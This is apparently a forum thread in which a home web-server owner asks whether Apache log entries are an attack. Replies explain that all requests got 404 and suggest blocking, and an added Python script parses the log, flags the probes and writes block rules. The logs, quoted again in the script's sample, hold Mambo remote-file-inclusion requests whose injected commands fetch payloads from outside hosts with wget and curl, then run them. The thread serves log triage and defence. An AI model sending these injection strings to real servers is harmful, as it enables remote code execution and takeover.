basicinstinct (Australia) asked:
My WebServer Logs - Is this an attack?

Hi, I found some weird entries in my webserver access logs.  My webserver could only have been found by port scanning - it is running on my home PC and I use dynamic DNS to locate it.  It is basically just used by friends and family in other states to view pictures of my new baby son.

I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.

NOTE: None of the resources being requested exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested.  It looks to me like someone is fishing around for some known vulnerabilities (and not finding any, I hope).

I'd appreciate any advice on what you think the logs indicate...  Is this an attack or something innocent?

I'm running apache2.


218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

ASKER CERTIFIED SOLUTION (jss1199)

jhance

It's not a problem, however.  Note that all the responses are "404".  That means what was sought was not found.  If this were my server I'd simply put a block on this IP address to prevent further attempts.  You could try reporting this to the ISP that handles this IP but in most cases such requests get ignored.
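As an added example (not code from the thread or from either participant), here is the triage jhance describes, written as a Python script and run over the asker's own lines: it parses Apache's combined log format, tags the blind POSTs to every common xmlrpc.php location and the Mambo-style remote-file-inclusion attempts (a configuration path parameter pointed at an attacker-controlled URL, with a download-chmod-execute command chain behind it), checks whether every request from that address drew a 404, pulls out the addresses the payloads would have been fetched from, and emits block rules. The sample lines are constructed from the post: the masked last octet of the scanner's address is set to 1 (an assumption) and the benign request from 203.0.113.7 is made up for contrast. The Apache rule uses 2.2-era `Order`/`Deny` syntax, which is what the asker's 2006 apache2 would take.

```python
"""Triage Apache access-log lines for scanner/RFI probing (added example, not the thread's code)."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample: the asker's lines with the masked octet set to 1 (assumption),
# plus one made-up benign request from 203.0.113.7.
SAMPLE_LOG = """\
218.44.74.1 - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.1 - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.1 - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.1 - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.1 - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
203.0.113.7 - - [06/Apr/2006:14:07:01 +1000] "GET /photos/baby01.jpg HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
"""

# Combined log format. The request is matched non-greedily because an injected target
# can contain literal spaces (the "chmod 744  hey" fragment above), so the usual \S+
# for the request target would fail on exactly the lines we care about.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>.*?)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SCHEME_RE = re.compile(r'^(?:https?|ftp)://')                # whole value is a remote URL
URL_RE = re.compile(r"""(?:https?|ftp)://[^\s;'"|]+""")      # URLs embedded in a value
WGET_RE = re.compile(r'\bwget\s+([^\s;]+)')                   # wget target given without a scheme
CMD_RE = re.compile(r'(?:\bwget|\bcurl|\bchmod)\s|\./\w')     # download/chmod/execute chain


def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not parse."""
    m = LINE_RE.match(line.rstrip('\n'))
    if not m:
        return None
    rec = m.groupdict()
    method, _, rest = rec['request'].partition(' ')
    target, sep, proto = rest.rpartition(' HTTP/')   # split from the right: target may hold spaces
    if not sep:                                       # HTTP/0.9-style request with no version
        target, proto = rest, ''
    else:
        proto = 'HTTP/' + proto
    path, _, query = target.strip().partition('?')    # first '?' only; the RFI query holds a second one
    params = [(unquote(k), unquote(v)) for k, v in
              (p.partition('=')[::2] for p in query.split('&') if p)]
    rec.update(method=method, proto=proto, path=path, query=query, params=params)
    return rec


def classify(rec):
    """Tag one parsed request with the indicators it shows."""
    tags = set()
    if rec['method'] == 'POST' and rec['path'].endswith('/xmlrpc.php'):
        tags.add('xmlrpc_probe')                  # blind POST to a guessed xmlrpc.php location
    for _, value in rec['params']:
        if SCHEME_RE.match(value):
            tags.add('remote_file_include')       # an include/config path pointed at a remote URL
        if CMD_RE.search(value):
            tags.add('command_injection')         # shell chain smuggled in a parameter
    return tags


def payload_sources(rec):
    """Addresses the injected commands would fetch their payloads from (for blocking/reporting)."""
    found = set()
    for _, value in rec['params']:
        found.update(URL_RE.findall(value))
        found.update(WGET_RE.findall(value))
    return found


def summarize(log_text):
    """Per-source-IP view: what was asked for, what came back, and what it looks like."""
    by_ip = defaultdict(lambda: {'requests': 0, 'statuses': set(), 'paths': set(),
                                 'tags': set(), 'payload_sources': set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = by_ip[rec['ip']]
        s['requests'] += 1
        s['statuses'].add(rec['status'])
        s['paths'].add(rec['path'])
        s['tags'] |= classify(rec)
        s['payload_sources'] |= payload_sources(rec)
    return dict(by_ip)


def verdict(summary):
    """jhance's check: a scanner whose every request drew a 404 found nothing to hit."""
    if not summary['tags']:
        return 'benign'
    return 'scan, all 404' if summary['statuses'] == {'404'} else 'scan, some hits'


def block_rules(ip):
    """Drop the source at the packet filter and refuse it in Apache (2.2-era syntax)."""
    return [f'iptables -I INPUT -s {ip} -j DROP',
            f'<Location />\n    Order allow,deny\n    Allow from all\n    Deny from {ip}\n</Location>']


if __name__ == '__main__':
    for ip, s in summarize(SAMPLE_LOG).items():
        print(ip, s['requests'], 'requests', sorted(s['statuses']), sorted(s['tags']), '->', verdict(s))
        if s['tags']:
            print('  payload sources:', sorted(s['payload_sources']))
            print('\n'.join(block_rules(ip)))
```

The "all 404" verdict only says the probed paths were absent; it says nothing about whether other requests from the same address, or the same probes against a different vhost, succeeded, so run the summary over the whole log rather than the excerpt. The payload-source addresses are the ones worth adding to an outbound block and to any report to the ISP, since the scanning address is often itself a compromised host.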
basicinstinct (ASKER)

Thanks for the response - the link to isc.sans.org from jss is very informative.  Thanks also to jhance - I had not noticed the responses were all 404 - that's a relief.  I will indeed block this IP - good idea.

I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.  

Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.

Either way, I intend to contact this website and ask them to PLEASE EXPLAIN.  I will also write to the ISP.  It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought.  Perhaps they think it makes them some sort of "l33t hacker" or something equally silly, but they are just script kiddies, following the steps that someone else worked out for them.  I'm upset, but I'll stop raving now.